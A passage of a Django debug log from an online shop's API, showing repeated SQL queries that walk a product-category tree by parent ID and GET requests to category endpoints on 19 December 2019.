"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:53:45,355 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:53:45,357 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:53:45,359 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:53:45,363 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:53:45,366 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:53:45,372 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:53:45,375 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:53:45,378 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:53:45,382 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:53:45,385 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:53:45,391 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:53:45,395 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:53:45,400 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:53:45,404 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:53:45,409 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:53:45,413 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:53:45] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:53:45,672 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 3; args=(3,) DEBUG 2019-12-19 13:53:45,680 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) [19/Dec/2019 13:53:45] "GET /api/v1/categories/3 HTTP/1.0" 200 942 DEBUG 2019-12-19 13:53:45,720 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:53:45,728 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:53:45,734 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:53:45,738 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:53:45,744 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:53:45,749 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:53:45,753 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:53:45,757 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:53:45,760 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:53:45,766 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:53:45,770 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:53:45,774 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:53:45,779 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:53:45,785 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:53:45,791 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:53:45,794 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:53:45,799 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:53:45,803 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:53:45,807 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:53:45,813 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:53:45,817 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:53:45,821 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:53:45,825 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:53:45,829 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:53:45,833 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:53:45,840 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:53:45,844 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:53:45,848 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:53:45,852 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:53:45,856 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:53:45,862 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:53:45,866 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:53:45,870 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:53:45,874 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:53:45,877 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:53:45,884 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:53:45,889 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:53:45,893 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:53:45,896 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:53:45,900 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:53:45,904 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:53:45,908 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:53:45,912 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:53:45,916 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:53:45,920 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:53:45,926 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:53:45] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:53:45,989 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-19 13:53:45,997 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [19/Dec/2019 13:53:46] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-19 13:53:46,070 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 8; args=(8,) DEBUG 2019-12-19 13:53:46,082 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", 